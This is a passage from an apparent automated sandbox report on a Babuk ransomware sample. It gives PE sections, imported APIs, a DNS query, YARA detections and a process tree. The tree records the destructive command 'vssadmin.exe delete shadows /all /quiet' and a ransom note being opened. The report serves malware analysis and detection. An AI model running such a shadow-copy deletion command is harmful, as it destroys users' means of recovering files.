IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x170 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                            Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5ad3 | 0x5c00 | False | 0.437457540761 | data | 6.09290090795 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x7000 | 0x5b4 | 0x200 | False | 0.4765625 | data | 4.01435931521 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata | 0x8000 | 0xa06 | 0xc00 | False | 0.4052734375 | data | 4.58142496101 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.CRT | 0x9000 | 0x8 | 0x200 | False | 0.03515625 | data | 0.114463381259 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa000 | 0x464 | 0x600 | False | 0.666666666667 | data | 5.44035365652 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Imports

DLL | Import
KERNEL32.dll | GetModuleHandleA, GetProcAddress, LoadLibraryA, lstrcmpW, lstrlenW, SetVolumeMountPointW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, CreateFileW, WriteFile, DeleteCriticalSection, lstrlenA, GetCommandLineW, FindClose, FindFirstFileW, FindNextFileW, GetFileSizeEx, GetLogicalDrives, ReadFile, OpenProcess, SetFilePointerEx, WaitForSingleObject, CreateMutexA, WaitForMultipleObjects, GetCurrentProcessId, ExitProcess, CreateThread, ExitThread, SetProcessShutdownParameters, GetSystemInfo, lstrcmpiW, lstrcpyW, lstrcatW, OpenMutexA, MoveFileExW, WideCharToMultiByte, HeapAlloc, HeapFree, GetProcessHeap, ReleaseSemaphore, CreateSemaphoreA, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetTickCount, TerminateProcess, GetCurrentProcess, Sleep, GetLastError, CloseHandle, GetVolumePathNamesForVolumeNameW, GetDriveTypeW, FindVolumeClose, FindNextVolumeW, SetFileAttributesW, FindFirstVolumeW, IsProcessorFeaturePresent
USER32.dll | wsprintfA
ADVAPI32.dll | CryptEncrypt, CryptDestroyKey, CryptReleaseContext, CryptAcquireContextW, QueryServiceStatusEx, OpenServiceA, OpenSCManagerA, EnumDependentServicesA, ControlService, CloseServiceHandle, CryptImportKey
SHELL32.dll | SHEmptyRecycleBinA, CommandLineToArgvW, ShellExecuteW
NETAPI32.dll | NetShareEnum, NetApiBufferFree
RstrtMgr.DLL | RmGetList, RmRegisterResources, RmEndSession, RmStartSession
MPR.dll | WNetOpenEnumW, WNetCloseEnum, WNetEnumResourceW, WNetGetConnectionW

                                                                            Network Behavior

                                                                            UDP Packets

                                                                            DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 2, 2021 17:58:00.374592066 CET | 192.168.2.6 | 8.8.8.8 | 0xd74 | Standard query (0) | cdn.onenote.net | A (IP address) | IN (0x0001)

                                                                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 2, 2021 17:58:00.435359001 CET | 8.8.8.8 | 192.168.2.6 | 0xd74 | No error (0) | cdn.onenote.net | cdn.onenote.net.edgekey.net | | CNAME (Canonical name) | IN (0x0001)

                                                                            Code Manipulations

                                                                            System Behavior

                                                                            General

Start time: 17:55:11
Start date: 02/02/2021
Path: C:\Users\user\Desktop\babuk_v5.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\babuk_v5.exe'
Imagebase: 0xbf0000
File size: 30208 bytes
MD5 hash: 67E49CFCD12103B5EF2F9F331F092DBE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000000.335583534.0000000000BF1000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.420310947.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.421468331.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.412867169.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.411482740.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.421137860.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.411862150.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.419959542.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.374612389.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.418775876.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.412100680.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.419289818.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

                                                                            General

Start time: 17:55:16
Start date: 02/02/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\cmd.exe' /c vssadmin.exe delete shadows /all /quiet
Imagebase: 0x7ff7180e0000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                            General

Start time: 17:55:16
Start date: 02/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                            General

Start time: 17:55:17
Start date: 02/02/2021
Path: C:\Windows\System32\vssadmin.exe
Wow64 process (32bit): false
Commandline: vssadmin.exe delete shadows /all /quiet
Imagebase: 0x7ff63c900000
File size: 145920 bytes
MD5 hash: 47D51216EF45075B5F7EAA117CC70E40
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

                                                                            General

Start time: 17:56:00
Start date: 02/02/2021
Path: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
Imagebase: 0x7ff72e680000
File size: 13606304 bytes
MD5 hash: C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate

                                                                            General

Start time: 17:57:23
Start date: 02/02/2021
Path: C:\Windows\System32\notepad.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\How To Restore Your Files.txt
Imagebase: 0x7ff6a90d0000
File size: 245760 bytes
MD5 hash: BB9A06B8F2DD9D24C77F389D7B2B58D2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

                                                                            Disassembly

                                                                            Code Analysis

                                                                              Executed Functions

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
